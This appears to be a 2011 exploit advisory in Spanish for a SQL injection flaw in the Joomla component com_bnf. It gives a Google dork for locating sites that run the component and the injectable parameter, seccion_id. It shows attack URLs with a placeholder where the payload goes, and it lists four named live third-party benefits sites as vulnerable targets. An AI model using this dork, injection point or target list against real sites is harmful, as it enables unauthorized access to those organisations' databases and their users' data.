The Joomla BNF component suffers from a remote SQL injection vulnerability.
b81d32166fc2a54dc5ff2d39434bdc459a5bba282ae0c296123d77f375832467
# Exploit Title: Joomla Component (com_bnf) SQL Injection
Vulnerability
# Google Dork: index.php?option=com_bnf [1]
# Date: 22/12/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar [2]
# Tested on: Linux
Visiten : www.0x3a.com.ar [3] www.remoteexecution.com.ar [4]
www.remoteexecution.info [5]
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas,
LisandroLezaeta,Gaston Chareun,
Inyexion, Login-Root, KikoArg, Ricota,Truenex, sunplace, _tty0,
Sensei , Jorge Nuñez,
LinuxFer, Rash, Scorp, Alan++, y demas usuarios de #RemoteExecution
[SQL Injection]
El error se encuentra en la variable seccion_id
http://localhost/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL
[6] Inyection]&direccion=&direct=0&Itemid=0&lang=es
http://www.beneficioslacaja.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[7]
http://swissmedical.beneficios-corporativos.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[8]
http://www.blueclub.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[9]
http://www.beneficioszurich.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[10]
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
Links:
------
[1] http://index.php/?option=com_bnf
[2] http://www.delincuentedigital.com.ar/
[3] http://www.0x3a.com.ar/
[4] http://www.remoteexecution.com.ar/
[5] http://www.remoteexecution.info/
[6]
http://localhost/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL
[7]
http://www.beneficioslacaja.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es
[8]
http://swissmedical.beneficios-corporativos.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es
[9]
http://www.blueclub.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es
[10]
http://www.beneficioszurich.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es